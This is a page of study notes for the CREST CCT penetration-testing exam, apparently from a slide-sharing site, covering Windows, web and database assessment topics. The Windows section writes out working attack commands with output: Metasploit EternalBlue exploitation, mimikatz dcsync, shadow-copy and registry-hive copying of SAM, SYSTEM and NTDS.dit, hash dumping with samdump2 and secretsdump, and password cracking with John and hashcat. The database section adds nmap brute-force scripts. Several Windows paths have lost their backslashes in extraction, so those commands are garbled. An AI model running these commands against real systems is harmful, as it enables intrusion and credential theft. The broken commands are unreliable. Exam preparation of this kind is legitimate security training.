Uploaded byNathanAn
2,965 views

CREST CCT Lab Prep Notes

The document provides an overview of various topics related to web application security assessments including web servers and protocols, authentication and authorization mechanisms, input validation, session handling, encryption, and common attacks like cross-site scripting and injection attacks. Specific areas covered include vulnerabilities in web servers like IIS and Apache, HTTP methods and headers, flaws in application frameworks, APIs, and subcomponents, and methodologies for information gathering, authentication testing, authorization testing, application fuzzing, and using attacks.

Internetâ—¦

Embed presentation

Downloaded 277 times
Long Question Useful  Web Server Counter Measures – p158 2nd Edition Appendix A: Soft Skills and Assessment Management A5 Record Keeping, Interim Reporting & Final Results Understanding reporting requirements. Understanding the importance of accurate and structured record keeping during the engagement. Appendix B: Core Technical Skills B4 Network Mapping & Target Identification Analysis of output from tools used to map the route between the engagement point and a number of targets. Network sweeping techniques to prioritise a target list and the potential for false negatives. B11 Cryptography Differences between encryption and encoding. Symmetric / asymmetric encryption. Encryption algorithms: DES, 3DES, AES, RSA, RC4. Hashes: SHA1 and MD5 Message Integrity codes: HMAC Appendix C: Background Information Gathering & Open Source C3 Customer Web Site Analysis Analysis of information from a target web site, both from displayed content and from within the HTML source.
Appendix E: Microsoft Windows Security Assessment E4 Windows Passwords Password policies (complexity, lockout policies) Account Brute Forcing Hash Storage (merits of LANMAN, NTLMv1 / v2) Offline Password Analysis (rainbow tables / hash brute forcing) E5 Windows Vulnerabilities Knowledge of remote windows vulnerabilities, particularly those for which robust exploit code exists in the public domain. Video: MS17-010 – Eternal Blue msfconsole use auxiliary/scanner/smb/smb_ms17_010 show options set RHOSTS 10.10.12.107 exploit use exploit/windows/smb/ms17_010_eternalblue show options set RHOSTS 10.10.12.107 exploit Metasploit.txt Metasploit Start up and Update Example: Metasploit - Exploiting MS17-010 - Eternalblue Vulnerability Exploits search: IIS, RDP use $exploit show options | show payloads | show targets set settings ... exploit/run (for auxiliary) Auxiliary Modules show options, set RHOSTS (and other values such THREADS, VHOSTS), run Eternal Blue SMB Remote Windows Kernel Pool Corruption-MS17-010 Knowledge of local windows privilege escalation vulnerabilities and techniques. Knowledge of common post exploitation activities:  Obtain password hashes, both from the local SAM and cached credentials HASHES  Hashes on stored in the SAM database on a Windows system, or the NTDS database on the Domain Controller. 1. SAM file (need both C:windowssystem32configSAM, and C:windowssystem32configsystem) 2. Registry (HKEY_LOCAL_MACHINESecurityCache for domain credentials, HKEY_LOCAL_MACHINESAM for local credentials)
3. Domain Controller: C:WindowsNTDSNTDS.dit 4. In-memory (dump with mimikatz) -- however this last one isn't "stored" as in written-to-disk.  LM-hashes is the oldest password storage used by Windows, dating back to OS/2 in the 1980’s and were turned off by default starting in Windows Vista/Server 2008. it is possible to enable it in later versions through a GPO setting (even Windows 2016/10).  NTHash is often referred to as NTLM hash. The v1 of the protocol uses both the NT and LM hash, depending on configuration and what is available. NTLMv2 (different algorithm) s the default in Windows since Windows 2000. OBTAINING THE HASHES  Mimikatz has a feature (dcsync) which utilises the Directory Replication Service (DRS) to retrieve the password hashes from the NTDS.DIT file. It can be executed from any system that is part of the domain from the context of domain administrator. lsadump::dcsync /domain:pentestlab.local /all /csv  The ntdsutil is a part of the domain controller ecosystem and its purpose is to enable administrators to access and manage the windows Active Directory database. ntdsutil activate instance ntds ifm create full C:ntdsutil quit quit Two new folders will be generated: Active Directory and Registry. The NTDS.DIT file will be saved in the Active Directory and the SAM and SYSTEM files will be saved into the Registry folder.  DiskShadow is a Microsoft signed binary which is used to assist administrators with operations related to the Volume Shadow Copy Service (VSS). DiskShadow is included in Windows Server 2008, Windows Server 2012, and Windows Server 2016 and is a Windows signed binary.
 VSSadmin – Comes with Windows servers. The volume shadow copy is a Windows command line utility which enables administrators to take backups of computers, volumes and files even if they are in use by the operating system. vssadmin list shadows - check whether any shadow copies already exist vssadmin create shadow /for=C: - create a shadow copy, then copy ntds.dit and SYSTEM copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy1WindowsSystem32configSAM C:SAM1 copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy1WindowsSystem32configSYSTEM C:SYSTEM1 NTDS may not exist if you did not dump from a DC. vssadmin delete shadows /shadow=[GUID] - delete the shadow copy (if you need to run this…) Then extract using either SamDump2 or impacket.  Can also use Cain to dump the passwords.  Registry and SamDump2 C:WINDOWSsystem32>reg save hklmsam c:sam The operation completed successfully. C:WINDOWSsystem32>reg save hklmsystem c:system The operation completed successfully. C:WINDOWSsystem32>reg save hklmsecurity c:security The operation completed successfully. The security file contains the cached credentials. Copy the files to Kali and run SamDump2 (or impacket which gives more info) root@Kali:~# samdump2 system sam *disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: *disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: *disabled* :503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: *disabled* :504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::  PWdump - PWdump7 needs to be run as admin. pwdump7 > hash.txt  Cached Credentials Having dumped the security hive from registry: C:WINDOWSsystem32>reg save hklmsecurity c:security The operation completed successfully. Then from Kali use impacket gives information of SAM and SYSTEM. The file name is sam and system. If you don’t have security you can remove it. root@Kali:~# python /usr/share/doc/python-impacket/examples/secretsdump.py -sam sam - security security -system system LOCAL
Impacket v0.9.13 - Copyright 2002-2015 Core Security Technologies [*] Target system bootKey: 0x4e52ab9bfb9019fb6827913377943620 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:: : [*] Dumping cached domain logon information (uid:encryptedHash:longDomain:domain) [*] Dumping LSA Secrets [*] DPAPI_SYSTEM 0000 01 00 00 00 D7 C6 B0 AD 57 36 7C D6 4C 22 3A 59 ........W6|.L":Y 0010 25 9E 19 C8 3F E0 8C E7 FD C5 53 6F B4 84 2E 83 %...?.....So.... 0020 3B DB 63 C1 A5 EB FF 3A 05 89 C4 29 ;.c....:...) [*] NL$KM 0000 5E FD D7 75 81 79 FE B5 B8 09 59 CA D9 68 76 32 ^..u.y....Y..hv2 0010 B4 96 A7 B3 A6 12 66 1D D9 AE C0 ED AE D2 0C B7 ......f......... 0020 6E E7 8E 89 D2 41 BF 92 58 E6 D4 C7 04 54 89 58 n....A..X....T.X 0030 01 EA D5 75 6C 8E EE E6 8C D6 F6 AA 02 12 7A 47 ...ul.........zG [*] RasDialParams!S-1-5-21-2026301890-2774087781-1233172474-1001#0 0000 35 00 30 00 30 00 39 00 30 00 39 00 33 00 37 00 5.0.0.9.0.9.3.7. 0010 00 00 31 00 36 00 30 00 38 00 00 00 33 00 00 00 ..1.6.0.8...3... 0020 00 00 00 00 44 00 61 00 76 00 69 00 64 00 33 00 ....D.a.v.i.d.3. 0030 30 00 39 00 2D 00 56 00 50 00 4E 00 00 00 40 00 0.9.-.V.P.N...@. 0040 4A 00 61 00 70 00 61 00 6E 00 30 00 31 00 23 00 x.x.x.x.x.x.x.x. 0050 00 00 00 00 30 00 00 00 00 00 ....0..... [*] Cleaning up...  Obtain locally-stored clear-text password  Crack password hashes John the Ripper, Cain & Abel is a Windows-based tool with a host of useful features, including a password cracker. It's normally a good idea to break very weak passwords with a simple dictionary attack and short (5 character) brute force attack first, then let the Rainbow Tables pick up the rest. SHA256 Hashing: kali# echo pearson | sha256sum 901….ba13 Windows password storage does not use salt so hashed passwords would look the same. Unlike in Linux, because of use of salting, if two users have same password then they will look different. NT password hashes will be mixed case, whereas LMHash will be all uppercase. John the Ripper John comes with its own dictionary at /usr/share/john/password.lst You can edit the file to add your own passwords, or use your own list using wordlist=/usr/share/john/file.lst. In the output, the username will be on the right-hand side and cracked password on the left. The number next to the username tells you which side of the password it is cracking for LMHASH which stores if password is greater than 8 characters it splits it into two and always make password upper case. So lowercase, password would be stored as PASSWOR and D. kali# john password-hashes.txt ACME201 (fireman:2)
The below command will show all passwords that have been cracked: kali# john –show password-hashes.txt The hidden directory in home ./john stores the output files of .log, .pot, .rec Change the format to NT cracking (default is LMHASH) kali# john password-hashes.txt –-format=nt …and then have to specify format in show command: kali# john –show password-hashes.txt –format=nt Hashcat GPU (graphics card) support, so faster and works on Windows and is able to crack a large variety of hash formats. hashcat64.exe –potfile-path cracked-passwords.txt -m 3000 password_hashes.txt -a 3 The potfile is where the cracked passwords will be stored, the -m 3000 specifies the hash format being cracked, 3000 is for LMhash and 1000 is for NT Hash, the -a specifies brute force. To view the cracked passwords: hashcat64.exe –m 3000 –potfile-path cracked_passwords.pot password_hashes.txt –show --username Can use a dictionary attack: hashcat64.exe –potfile-path cracked_passwords.pot -m 3000 password_hashes.txt D:toolshatsrockyou.txt -r D;toolhashcat-3.6.0rulesInsidePro-PasswordsPro.rule The rule specifies various mangling rules.  Check patch levels – CREST Exam Notes; WMIC: wmic qfe list full /format:htable > hotfixes.htm Powershell (enter powershell) Get-WmiObject -Class "win32_quickfixengineering" get-hotfix Linux: Debian or Ubuntu: apt-get upgrade -s | grep -i security RH: rpm -qa --last  Derive list of missing security patches -  Reversion to previous state: System Restore is a Windows feature that can help fix certain types of crashes and other computer problems.
Appendix G: Web Technologies G2 Web Servers & their Flaws Common web servers and their fundamental differences and vulnerabilities associated with them:  IIS – P372 Network Security Assessment  Apache (and variants) – P373 Network Security Assessment G4 Web Protocols Web protocols: HTTP, HTTPS, SOAP. All HTTP web methods and response codes.  See Exam Notes - Identifying Permitted HTTP Methods, also Web App Notes for Nmap NSE and Metasploit script (p16) HTTP Header Fields relating to security features  See Web App and Exam Notes G7 Web Application Servers Vulnerabilities in common application frameworks, servers and technologies: .NET (p413), J2EE, ColdFusion (p403), Ruby on Rails (p409) and AJAX. Chapter 14, Network Security Assessment. AJAX Security - CS.html DotNet Security - CS.html Ruby on Rails - CS.html G8 Web APIs Application interfaces: CGI, ISAPI filters and Apache modules. G9 Web Sub-Components Web architecture sub-components: Thin/Thick web clients, servlets and applets, Active X. Flash Application Testing .Net Thick Clients Java Applets Decompilation of client-side code Base64 decoding? – Burp Decoder
Appendix H: Web Testing Methodologies H3 Information Gathering from Web Mark-up Examples of the type of information available in web page source that may prove useful to an attacker:  Hidden Form Fields – Burp: Proxy > Options > Response Modification: Unhide Hidden Form Fields.  Database Connection Strings  Credentials  Developer Comments  Other included files  Authenticated-only URLs H4 Authentication Mechanisms Common pitfalls associated with the design and implementation of application authentication mechanisms.  Useful p180, 2nd Edition H5 Authorisation Mechanisms Common pitfalls associated with the design and implementation of application authorisation mechanisms. H6 Input Validation The importance of input validation as part of a defensive coding strategy. How input validation can be implemented and the differences between white listing, black listing and data sanitisation. H7 Application Fuzzing Fuzzing and its relevance within web-app penetration testing. The use of fuzz strings and their potential effects. Potential dangers of fuzzing web applications. H9 Use of Cross Site Scripting Attacks Potential implications of a cross site scripting vulnerability. Ways in which the technique can be used to benefit an attacker. H10 Use of Injection Attacks Potential implications of injection vulnerabilities:  SQL injection  LDAP injection  Code injection  XML injection Ways in which these techniques can be used to benefit an attacker.
H11 Session Handling Common pitfalls associated with the design and implementation of session handling mechanisms. H12 Encryption Common techniques used for encrypting data in transit and data at rest, either on the client or server side. Identification and exploitation of Encoded values (e.g. Base64) and Identification and exploitation of Cryptographic values (e.g. MD5 hashes) Identification of common SSL vulnerabilities H13 Source Code Review Common techniques for identifying and reviewing deficiencies in the areas of security. ď‚· Useful table p164, 2nd Edition
Appendix I: Web Testing Techniques I1 Web Site Structure Discovery Spidering tools and their relevance in a web application test for discovering linked content. Forced browsing techniques to discover default or unlinked content - Web Application Security Methodology and Testing: Directory and File Scanning, also Nikto ď‚· Identification of functionality within client-side code I2 Cross Site Scripting Attacks Arbitrary JavaScript execution. Using Cross Site Scripting techniques to obtain sensitive information from other users. Phishing techniques. ď‚· See XSS I3 SQL Injection Determine the existence of an SQL injection condition in a web application. Determine the existence of a blind SQL injection condition in a web application. Exploit SQL injection to enumerate the database and its structure. Exploit SQL injection to execute commands on the target server. ď‚· See SQL injection I4 Session ID Attacks Investigate session handling within a web application. Harvest and analyse a number of session identifiers for weaknesses. ď‚· See Testing Session ID and Token Strength ď‚· Useful table p167 2nd Edition I5 Fuzzing The concept of fuzzing within a web application testing methodology. Common fuzzing tools. I6 Parameter Manipulation Parameter manipulation techniques, particularly the use of client-side proxies. I7 Data Confidentiality & Integrity Identifying weak (or missing) encryption. Identifying insecure SSL configurations.
Identify insecure use of encoding techniques I8 Directory Traversal Identifying directory traversal vulnerabilities within applications.  See RFI and LFI, Path Transversal I9 File Uploads Identifying common vulnerabilities with file upload capabilities within applications.  See Uploads. I10 Code Injection Investigate and exploitation of code injection vulnerabilities within web applications  See OS command injection – get Commix working… I11 CRLF Attacks Assessment of web applications for CRLF vulnerabilities  See HTTP Testing – Headers I12 Application Logic Flaws Assessing the logic flow within an application and the potential for subverting the logic.
Appendix J: Databases J1 Microsoft SQL Server (p424) Knowledge of common attack vectors for Microsoft SQL Server. Understanding of privilege escalation and attack techniques for a system compromised via database connections.  See CREST exam notes J2 Oracle RDBMS (p426) Derivation of version and patch information from hosts running Oracle software. Default Oracle accounts.  See CREST exam notes J3 Web / App / Database Connectivity Common databases (MS SQL server, Oracle, MySQL and Access) and the connection and authentication methods used by web applications  See CREST exam notes Useful Nmap Scripts MS SQL ms-sql-brute.nse - Performs password guessing against Microsoft SQL Server. SQL Server 2005 and later versions include support for account lockout policies. MySQL nmap -p 3306 –script=”mysql-info” 127.0.0.1 - Connects to a MySQL server and prints information such as the protocol and version numbers, thread ID, status, capabilities, and the password salt. nmap -sV -sC <target> 3306/tcp open mysql | mysql-info: | Protocol: 10 | Version: 5.0.51a-3ubuntu5.1 | Thread ID: 7 | Capabilities flags: 40968 | Some Capabilities: ConnectWithDatabase, SupportsTransactions, Support41Auth | Status: Autocommit |_ Salt: bYytNQ/4V6IN+*3`imj mysql-enum – Performs valid-user enumeration. Server version 5.x are susceptible to an user enumeration attack due to different messages during login when using old authentication mechanism from versions 4.x and earlier. mysql-brute – Basic brute force, can be run without word list. nmap --script=mysql-brute <target> 3306/tcp open mysql | mysql-brute: | Accounts | root:root - Valid credentials
Additional Identification of more recent SSL vulnerabilities – e.g. BEAST (page 318) ssl-enum-ciphers - This script repeatedly initiates SSLv3/TLS connections, each time trying a new cipher or compressor while recording whether a host accepts or rejects it. The end result is a list of all the cipher suites and compressors that a server accepts. nmap -sV --script ssl-enum-ciphers -p 443 <host>  POODLE - We can deduce if a server is vulnerable to poodle if it supports SSLv3 protocol and uses CBC ciphers.  BEAST - Any server supporting SSLv3 OR TLS 1.0 and uses CBC ciphers. BEAST was indeed an attack on CBC mode with predictable (in fact known) IV in SSL3 and TLS1.0, because those protocols used the last block of the previous record, which (usually) has already been sent and seen by the adversary, as the IV for the next record. POODLE is not an attack on IV at all; it is a padding oracle attack on the padding used in SSL3 (and it turned out some debatably defective TLS1.0 implementations also), hence the acronym Padding Oracle on Downgraded Legacy Encryption Examples.txt HTTP Header Fields relating to security features – e.g. HSTS  See CREST Notes: HTTP Header Fields relating to security features  Useful p172, 2nd Edition Strict-Transport-Security.html Web Server security misconfigurations – e.g. WebDAV - Page 340, 372, and p116 2nd Edition http-webdav-scan - The script sends an OPTIONS request which lists the dav type, server type, date and allowed methods. It then sends a PROPFIND request and tries to fetch exposed directories and internal ip addresses by doing pattern matching in the response body. nmap --script http-webdav-scan -p80,8080 <target> Script Output PORT STATE SERVICE 8008/tcp open http | http-webdav-scan: | Allowed Methods: GET, HEAD, COPY, MOVE, POST, PUT, PROPFIND, PROPPATCH, OPTIONS, MKCOL, DELETE, TRACE, REPORT | Server Type: DAV/0.9.8 Python/2.7.6 | Server Date: Fri, 22 May 2015 19:28:00 GMT | WebDAV type: Unknown | Directory Listing: | http://localhost | http://localhost:8008/WebDAVTest_b1tqTWeyRR | http://localhost:8008/WebDAVTest_A0QWJb7hcK | http://localhost:8008/WebDAVTest_hf9Mqqpi1M |_ http://localhost:8008/WebDAVTest_Ds5KBFywDq
Metasploit has a few modules to test for WebDAV presence. WebDAV.txt Decompilation of client-side code – e.g. Flash, Java, .Net Flash  Flash maintains its own cookie store that allows for cookies (that can’t be deleted directly from the browser).  ActionScript is an open source scripting language that compiles into bytecode and is leveraged both in Adobe Flash and Apache Flex. The bytecode is executed within an ActionScript Virtual Machine (AVM), which provides a similar sandbox environment to Java.  Though the ActionScript-compiled bytecode is not human-readable, tools such as SWFScan24 can turn the bytecode back into ActionScript.  JPEXS Free Flash Decompiler  Perl Script – SWF-File-0.42 Java  Java code runs in two primary ways: either through standalone Java applications or through web applets. Applets are Java code specifically designed to run within a web page.  Java has a security model around the applets that tries to prevent them from calling malicious code. This model, also known as a sandbox.  A core difference between a signed applet and an unsigned applet (quarantined within the sandbox) is that a signed applet can execute code outside of the sandbox.  Actions like accessing the file system or executing operating system commands are blocked by default. The Java security model requires code to be trusted or permission to be given before accessing functionality that has security implications.  Java code is compiled into byte code resulting in a compiled class file and then proceed by the JVM.  Reversing Java using JD-GUI – page 391 .Net  JustDecompile Vulnerabilities in increasingly prevalent application frameworks – e.g. Rail (p409) Flash Application Testing Java Applets .Net Thick Clients Identification of functionality within client-side code that is accessible only to privileged users

More Related Content

PDF
CREST CCT Exam Prep Notes
byNathanAn
 
PDF
Oscp preparation
byManich Koomsusi
 
PPTX
Abusing Microsoft Kerberos - Sorry you guys don't get it
byBenjamin Delpy
 
PDF
No Easy Breach DerbyCon 2016
byMatthew Dunwoody
 
PPTX
Hunt for Domain Controller : Active Directory Pentesting Session
byhacknpentest
 
PPTX
Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)
byScott Sutherland
 
PDF
Attacker's Perspective of Active Directory
bySunny Neo
 
PDF
Recon for Bug Bounty by Agnibha Dutta.pdf
bynull - The Open Security Community
 
CREST CCT Exam Prep Notes
byNathanAn
 
Oscp preparation
byManich Koomsusi
 
Abusing Microsoft Kerberos - Sorry you guys don't get it
byBenjamin Delpy
 
No Easy Breach DerbyCon 2016
byMatthew Dunwoody
 
Hunt for Domain Controller : Active Directory Pentesting Session
byhacknpentest
 
Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)
byScott Sutherland
 
Attacker's Perspective of Active Directory
bySunny Neo
 
Recon for Bug Bounty by Agnibha Dutta.pdf
bynull - The Open Security Community
 

What's hot

PPT
Distributed Deadlock Detection.ppt
byBabar Kamran Ahmed (LION)
 
PPT
Digital Signature Standard
bySou Jana
 
PDF
Kerberos
bySparkbit
 
PDF
CSMA/CD
bysainadh kamatala
 
PPT
SMTP and TCP protocol
byDivyaKS18
 
PPTX
Cryptographic Algorithms: DES and RSA
byaritraranjan
 
PDF
Sample Network Analysis Report based on Wireshark Analysis
byDavid Sweigert
 
PPTX
Ip security
byNaveen Dubey
 
PDF
8. mutual exclusion in Distributed Operating Systems
byDr Sandeep Kumar Poonia
 
PPTX
Distributed Transactions(flat and nested) and Atomic Commit Protocols
bySachin Chauhan
 
PPTX
TCP protocol flow control
byanuragjagetiya
 
PPTX
TCP/IP 3-way Handshake
byAlok Tripathi
 
PPTX
NMAP
byPrateekAryan1
 
PDF
Practical Byzantine Fault Tolernace
byYongraeJo
 
PPT
Email Security : PGP & SMIME
byRohit Soni
 
PPT
User Datagram protocol For Msc CS
byThanveen
 
PPTX
Transposition cipher techniques
bySHUBHA CHATURVEDI
 
PPT
Clock synchronization in distributed system
bySunita Sahu
 
PPT
Firewalls
byUniversity of Central Punjab
 
PPT
Network layer tanenbaum
byMahesh Kumar Chelimilla
 
Distributed Deadlock Detection.ppt
byBabar Kamran Ahmed (LION)
 
Digital Signature Standard
bySou Jana
 
Kerberos
bySparkbit
 
CSMA/CD
bysainadh kamatala
 
SMTP and TCP protocol
byDivyaKS18
 
Cryptographic Algorithms: DES and RSA
byaritraranjan
 
Sample Network Analysis Report based on Wireshark Analysis
byDavid Sweigert
 
Ip security
byNaveen Dubey
 
8. mutual exclusion in Distributed Operating Systems
byDr Sandeep Kumar Poonia
 
Distributed Transactions(flat and nested) and Atomic Commit Protocols
bySachin Chauhan
 
TCP protocol flow control
byanuragjagetiya
 
TCP/IP 3-way Handshake
byAlok Tripathi
 
NMAP
byPrateekAryan1
 
Practical Byzantine Fault Tolernace
byYongraeJo
 
Email Security : PGP & SMIME
byRohit Soni
 
User Datagram protocol For Msc CS
byThanveen
 
Transposition cipher techniques
bySHUBHA CHATURVEDI
 
Clock synchronization in distributed system
bySunita Sahu
 
Firewalls
byUniversity of Central Punjab
 
Network layer tanenbaum
byMahesh Kumar Chelimilla
 

Similar to CREST CCT Lab Prep Notes

PPT
Module 8 System Hacking
byleminhvuong
 
PDF
_Hackercool - September 2021.pdf
byssuser5e1b13
 
PDF
DEFCON 23 - Gerard Laygui - forensic artifacts pass the hash att
byFelipe Prado
 
PPTX
Cyber security and ethical hacking 9
byShekh Md Mehedi Hasan
 
PDF
CNIT 124: Ch 9: Password Attacks
bySam Bowne
 
PDF
Wce12 uba ampliasecurity_eng
byfangjiafu
 
PPT
Vista Forensics
byCTIN
 
PDF
LNK Payload exploit in windows
byssuser1d7287
 
DOCX
Lab-12 Social Engineering and Physical Security The firs.docx
bypauline234567
 
PPTX
Password cracking
byIlan Mindel
 
PPT
Class Presentation
bywebhostingguy
 
PPTX
Owning computers without shell access 2
byRoyce Davis
 
PPTX
Defcon 20 stamp out hash corruption crack all the things
byclaudijd
 
PPT
Windows network security
byInformation Technology
 
PDF
Ethical hacking mind map
bydasdwwe1
 
PDF
Free Computer Forensic Software's list - by Forensic Control
byraiyankhair47
 
PDF
CNIT 152 12 Investigating Windows Systems (Part 2)
bySam Bowne
 
PDF
NTLM
byGuang Ying Yuan
 
PPTX
Windows Registry Forensics - Artifacts
byMD SAQUIB KHAN
 
PDF
CNIT 121: 12 Investigating Windows Systems (Part 2 of 3)
bySam Bowne
 
Module 8 System Hacking
byleminhvuong
 
_Hackercool - September 2021.pdf
byssuser5e1b13
 
DEFCON 23 - Gerard Laygui - forensic artifacts pass the hash att
byFelipe Prado
 
Cyber security and ethical hacking 9
byShekh Md Mehedi Hasan
 
CNIT 124: Ch 9: Password Attacks
bySam Bowne
 
Wce12 uba ampliasecurity_eng
byfangjiafu
 
Vista Forensics
byCTIN
 
LNK Payload exploit in windows
byssuser1d7287
 
Lab-12 Social Engineering and Physical Security The firs.docx
bypauline234567
 
Password cracking
byIlan Mindel
 
Class Presentation
bywebhostingguy
 
Owning computers without shell access 2
byRoyce Davis
 
Defcon 20 stamp out hash corruption crack all the things
byclaudijd
 
Windows network security
byInformation Technology
 
Ethical hacking mind map
bydasdwwe1
 
Free Computer Forensic Software's list - by Forensic Control
byraiyankhair47
 
CNIT 152 12 Investigating Windows Systems (Part 2)
bySam Bowne
 
NTLM
byGuang Ying Yuan
 
Windows Registry Forensics - Artifacts
byMD SAQUIB KHAN
 
CNIT 121: 12 Investigating Windows Systems (Part 2 of 3)
bySam Bowne
 

CREST CCT Lab Prep Notes

  • 1.
    Long Question Useful Web Server Counter Measures – p158 2nd Edition Appendix A: Soft Skills and Assessment Management A5 Record Keeping, Interim Reporting & Final Results Understanding reporting requirements. Understanding the importance of accurate and structured record keeping during the engagement. Appendix B: Core Technical Skills B4 Network Mapping & Target Identification Analysis of output from tools used to map the route between the engagement point and a number of targets. Network sweeping techniques to prioritise a target list and the potential for false negatives. B11 Cryptography Differences between encryption and encoding. Symmetric / asymmetric encryption. Encryption algorithms: DES, 3DES, AES, RSA, RC4. Hashes: SHA1 and MD5 Message Integrity codes: HMAC Appendix C: Background Information Gathering & Open Source C3 Customer Web Site Analysis Analysis of information from a target web site, both from displayed content and from within the HTML source.
  • 2.
    Appendix E: MicrosoftWindows Security Assessment E4 Windows Passwords Password policies (complexity, lockout policies) Account Brute Forcing Hash Storage (merits of LANMAN, NTLMv1 / v2) Offline Password Analysis (rainbow tables / hash brute forcing) E5 Windows Vulnerabilities Knowledge of remote windows vulnerabilities, particularly those for which robust exploit code exists in the public domain. Video: MS17-010 – Eternal Blue msfconsole use auxiliary/scanner/smb/smb_ms17_010 show options set RHOSTS 10.10.12.107 exploit use exploit/windows/smb/ms17_010_eternalblue show options set RHOSTS 10.10.12.107 exploit Metasploit.txt Metasploit Start up and Update Example: Metasploit - Exploiting MS17-010 - Eternalblue Vulnerability Exploits search: IIS, RDP use $exploit show options | show payloads | show targets set settings ... exploit/run (for auxiliary) Auxiliary Modules show options, set RHOSTS (and other values such THREADS, VHOSTS), run Eternal Blue SMB Remote Windows Kernel Pool Corruption-MS17-010 Knowledge of local windows privilege escalation vulnerabilities and techniques. Knowledge of common post exploitation activities:  Obtain password hashes, both from the local SAM and cached credentials HASHES  Hashes on stored in the SAM database on a Windows system, or the NTDS database on the Domain Controller. 1. SAM file (need both C:windowssystem32configSAM, and C:windowssystem32configsystem) 2. Registry (HKEY_LOCAL_MACHINESecurityCache for domain credentials, HKEY_LOCAL_MACHINESAM for local credentials)
  • 3.
    3. Domain Controller:C:WindowsNTDSNTDS.dit 4. In-memory (dump with mimikatz) -- however this last one isn't "stored" as in written-to-disk.  LM-hashes is the oldest password storage used by Windows, dating back to OS/2 in the 1980’s and were turned off by default starting in Windows Vista/Server 2008. it is possible to enable it in later versions through a GPO setting (even Windows 2016/10).  NTHash is often referred to as NTLM hash. The v1 of the protocol uses both the NT and LM hash, depending on configuration and what is available. NTLMv2 (different algorithm) s the default in Windows since Windows 2000. OBTAINING THE HASHES  Mimikatz has a feature (dcsync) which utilises the Directory Replication Service (DRS) to retrieve the password hashes from the NTDS.DIT file. It can be executed from any system that is part of the domain from the context of domain administrator. lsadump::dcsync /domain:pentestlab.local /all /csv  The ntdsutil is a part of the domain controller ecosystem and its purpose is to enable administrators to access and manage the windows Active Directory database. ntdsutil activate instance ntds ifm create full C:ntdsutil quit quit Two new folders will be generated: Active Directory and Registry. The NTDS.DIT file will be saved in the Active Directory and the SAM and SYSTEM files will be saved into the Registry folder.  DiskShadow is a Microsoft signed binary which is used to assist administrators with operations related to the Volume Shadow Copy Service (VSS). DiskShadow is included in Windows Server 2008, Windows Server 2012, and Windows Server 2016 and is a Windows signed binary.
  • 4.
     VSSadmin –Comes with Windows servers. The volume shadow copy is a Windows command line utility which enables administrators to take backups of computers, volumes and files even if they are in use by the operating system. vssadmin list shadows - check whether any shadow copies already exist vssadmin create shadow /for=C: - create a shadow copy, then copy ntds.dit and SYSTEM copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy1WindowsSystem32configSAM C:SAM1 copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy1WindowsSystem32configSYSTEM C:SYSTEM1 NTDS may not exist if you did not dump from a DC. vssadmin delete shadows /shadow=[GUID] - delete the shadow copy (if you need to run this…) Then extract using either SamDump2 or impacket.  Can also use Cain to dump the passwords.  Registry and SamDump2 C:WINDOWSsystem32>reg save hklmsam c:sam The operation completed successfully. C:WINDOWSsystem32>reg save hklmsystem c:system The operation completed successfully. C:WINDOWSsystem32>reg save hklmsecurity c:security The operation completed successfully. The security file contains the cached credentials. Copy the files to Kali and run SamDump2 (or impacket which gives more info) root@Kali:~# samdump2 system sam *disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: *disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: *disabled* :503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: *disabled* :504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::  PWdump - PWdump7 needs to be run as admin. pwdump7 > hash.txt  Cached Credentials Having dumped the security hive from registry: C:WINDOWSsystem32>reg save hklmsecurity c:security The operation completed successfully. Then from Kali use impacket gives information of SAM and SYSTEM. The file name is sam and system. If you don’t have security you can remove it. root@Kali:~# python /usr/share/doc/python-impacket/examples/secretsdump.py -sam sam - security security -system system LOCAL
  • 5.
